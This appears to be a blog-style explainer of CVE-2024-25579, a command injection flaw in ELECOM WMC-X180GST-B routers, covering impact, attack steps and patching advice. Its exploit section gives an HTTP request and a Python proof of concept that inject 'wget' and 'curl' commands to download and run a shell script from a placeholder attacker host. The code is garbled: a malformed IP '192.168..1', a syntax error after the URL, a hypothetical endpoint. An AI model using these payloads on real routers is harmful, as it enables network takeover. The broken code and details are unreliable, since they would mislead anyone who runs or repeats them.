CVE-2024-25579 - OS Command Injection in ELECOM Routers (WMC-X180GST-B/e-Mesh Starter Kit) Explained

In early 2024, a critical OS command injection vulnerability was discovered in several ELECOM wireless LAN routers, most notably in the WMC-X180GST-B model, which is also included in the e-Mesh Starter Kit "WMC-2LX-B". Named CVE-2024-25579, this bug allows an attacker with administrative access and network access to execute arbitrary system commands on the router, potentially compromising the device and the network it manages.

Let's break down what this means, how the exploit works, and what you can do to stay safe.

Summary: What is CVE-2024-25579?

- Affected devices: ELECOM routers, especially model WMC-X180GST-B (including e-Mesh Starter Kit "WMC-2LX-B")

Vulnerability type: OS command injection

- Impact: A local attacker (with admin access from the network) can execute any operating system command on the router

Official Reference

- JPCERT/CC CVE-2024-25579 Detail (Japanese)
- National Vulnerability Database (NVD) Entry

How the Attack Works

The root of CVE-2024-25579 lies in improper input validation within the router's web management interface. When logged in as an administrator, a user can trigger web pages/API endpoints that eventually pass user-controlled data to system-level commands without proper sanitization.

An attacker who knows the admin credentials (or can guess/steal them) sends a crafted HTTP request, inserting shell metacharacters (; & |) along with their own commands. The router then executes these commands with high privileges.

Attacker logs into the router's admin web interface over the local network.

2. Crafts a specific request to a vulnerable endpoint, placing malicious OS commands in a field (like SSID, device name, etc.).

The router runs the input as part of a system command, executing whatever the attacker placed.

4. Attacker gains code execution and takes over the device/network.

Practical Exploit Example

Disclaimer:
This information is for educational purposes only. *Do not exploit devices without permission*.

Let's say the router has an HTTP POST interface for setting the device name, and this input is not sanitized:

POST /api/device_name
Host: 192.168..1
Cookie: session=valid_admin_session_cookie
Content-Type: application/x-www-form-urlencoded

name=myrouter; wget http://attacker-ip/reverse.sh | sh

What happens:
Instead of just setting the device name, the command after the ; (semicolon) runs on the router! The above example makes the device download and run a shell script from an attacker's server.

Python PoC Example:

import requests

# Router login info
router_ip = "192.168..1"
admin_sess_cookie = "session=valid_admin_session_cookie"

# Our payload will download and execute a script from 'attacker-ip'
exploit_payload = "routername; curl http://attacker-ip:808/pwn.sh | sh"

headers = {
    'Cookie': admin_sess_cookie,
    'Content-Type': 'application/x-www-form-urlencoded'
}

data = {
    "name": exploit_payload
}

response = requests.post(
    f"http://{router_ip}/api/device_name";,
    headers=headers,
    data=data
)

print("Status:", response.status_code)
print("Response:", response.text)

Why Is This Dangerous?

- Persistent Control: Once code is running on the router, attackers can install backdoors or redirect traffic.
- Full Network Access: Malicious code on the router can eavesdrop, modify, or block traffic for all users on the network.

All unpatched ELECOM WMC-X180GST-B routers

- Any e-Mesh Starter Kit "WMC-2LX-B" using the above hardware/firmware

Update Firmware Immediately:

Check ELECOM's official support page for firmware updates and install them.

Restrict Admin Access:

Only use secure, strong passwords, and ensure that the admin interface is never exposed to the wider Internet. Only access it from trusted devices.

References

- JPCERT/CC Security Advisory (in English)
- ELECOM Security Advisory
- NVD CVE-2024-25579
- OSSSECURITY Mailing List - Disclosure Thread

Conclusion

CVE-2024-25579 is a serious threat for anyone using the affected ELECOM routers, especially in environments where network access is not tightly controlled. Exploiting this bug is straightforward for attackers who gain admin credentials—through guessing, phishing, or social engineering.

If you or your organization uses the WMC-X180GST-B or the e-Mesh Starter Kit "WMC-2LX-B", patch your device now and take additional steps to protect your network from unauthorized access.

Timeline

Published on: 02/28/2024 23:15:09 UTC
Last modified on: 08/28/2024 16:35:14 UTC